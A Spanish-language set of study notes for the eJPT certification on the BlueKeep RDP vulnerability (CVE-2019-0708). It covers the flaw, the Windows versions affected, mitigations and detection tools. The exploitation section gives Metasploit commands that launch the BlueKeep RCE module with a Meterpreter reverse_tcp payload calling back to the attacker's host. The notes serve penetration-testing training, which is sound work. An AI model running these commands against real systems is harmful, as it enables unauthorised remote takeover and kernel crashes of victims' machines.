> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/metodologias-de-evaluacion/evaluacion-de-vulnerabilidad/analisis-de-vulnerabilidades/bluekeep.md).

# BlueKeep

### 🧠 ¿Qué es BlueKeep?

**BlueKeep** es el nombre dado a una vulnerabilidad crítica en el servicio **RDP (Remote Desktop Protocol)** de Microsoft Windows. Fue registrada como **CVE-2019-0708** y anunciada públicamente por Microsoft en **mayo de 2019**.

#### 📌 Características clave:

* ⚡ Permite **ejecución remota de código (RCE)** sin necesidad de autenticación.
* 🧠 Afecta al **kernel de Windows** explotando una falla en el protocolo RDP.
* 🛠️ El atacante puede ejecutar código arbitrario con permisos de **SYSTEM**, comprometiendo completamente el sistema.
* 🌐 Puede ser utilizado para **movimiento lateral** en redes internas, facilitando la propagación automática similar a WannaCry.

***

### 🖥️ Sistemas Afectados

La vulnerabilidad afecta principalmente a versiones antiguas de Windows:

* 🪦 **Windows XP**
* 🪦 **Windows Vista**
* 🪦 **Windows 7**
* 🪦 **Windows Server 2008**
* 🪦 **Windows Server 2008 R2**

> ❗ Microsoft incluso publicó parches para sistemas **fuera de soporte oficial** como Windows XP, dada la gravedad del fallo.

***

### 🔬 Detalles Técnicos

* **Protocolo afectado:** Remote Desktop Protocol (RDP)
* **Puerto asociado:** `3389/TCP`
* **Tipo de fallo:** Corrupción de memoria en el componente `termdd.sys` al manejar paquetes RDP especialmente diseñados.
* **Resultado:** Acceso remoto sin credenciales con ejecución de código al **nivel del núcleo (kernel)**.

> 🎯 Al tratarse de una explotación del espacio de memoria del núcleo, **el exploit puede provocar fallos o pantallazos azules (BSOD)** si se ejecuta mal.

***

### 🛡️ Parches y Mitigaciones

* Microsoft lanzó el **parche oficial el 14 de mayo de 2019**.
* Se recomienda encarecidamente:
  * Aplicar los **últimos parches de seguridad**.
  * **Desactivar RDP** si no es necesario.
  * **Restringir el acceso al puerto 3389/TCP** mediante firewalls.
  * Utilizar herramientas como **Nmap, Metasploit** o **Netexec** para auditar la exposición.

***

### 🛠️ Detección y Explotación con Metasploit

Metasploit Framework incluye módulos para **verificar y explotar** la vulnerabilidad BlueKeep.

#### 🔍 1. **Comprobación de vulnerabilidad**

```bash
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
```

**Parámetros clave:**

```bash
set RHOSTS <IP objetivo>
set THREADS 10
run
```

Este módulo escaneará los sistemas indicados para comprobar si son vulnerables.

***

#### 💣 2. **Explotación remota (con precaución)**

```bash
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
```

**Opciones recomendadas:**

```bash
set RHOST <IP del objetivo>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <tu IP>
set LPORT 4444
run
```

> ⚠️ **Advertencia**: Dado que este exploit trabaja directamente con el kernel, hay un **alto riesgo de hacer caer el sistema objetivo** si no está perfectamente alineado con los parámetros esperados.

***

### 🧰 Herramientas útiles

* **nmap**:

  ```bash
  nmap -p3389 --script rdp-vuln-ms12-020 <IP>
  ```

  Aunque el script es para MS12-020, puede ayudar a identificar sistemas RDP sin parches o configuraciones peligrosas.
* **rdpscan** (herramienta ligera para BlueKeep):

  ```bash
  ./rdpscan <IP>
  ```
* **Netexec (antes CrackMapExec)**:

  ```bash
  netexec rdp <IP> --check
  ```
